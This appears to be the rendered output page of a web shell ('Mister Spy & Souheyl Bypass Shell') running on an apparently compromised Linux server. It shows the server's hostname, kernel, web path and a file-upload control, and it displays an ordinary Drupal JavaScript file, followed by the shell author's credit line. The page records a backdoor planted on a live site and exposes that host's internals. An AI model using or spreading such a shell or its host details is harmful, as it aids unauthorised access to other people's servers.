Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/sirius-pallets/web/core/misc/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/sirius-pallets/web/core/misc/tabledrag-ajax.js

/**
 * Ajax command for highlighting elements.
 *
 * @param {Drupal.Ajax} [ajax]
 *   An Ajax object.
 * @param {object} response
 *   The Ajax response.
 * @param {string} response.id
 *   The row id.
 * @param {string} response.tabledrag_instance
 *   The tabledrag instance identifier.
 * @param {number} [status]
 *   The HTTP status code.
 */
Drupal.AjaxCommands.prototype.tabledragChanged = function (
  ajax,
  response,
  status,
) {
  if (status !== 'success') {
    return;
  }

  const tableDrag = Drupal.tableDrag[response.tabledrag_instance];

  // eslint-disable-next-line new-cap
  const rowObject = new tableDrag.row(
    document.getElementById(response.id),
    '',
    tableDrag.indentEnabled,
    tableDrag.maxDepth,
    true,
  );
  rowObject.markChanged();
  rowObject.addChangedWarning();
};

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net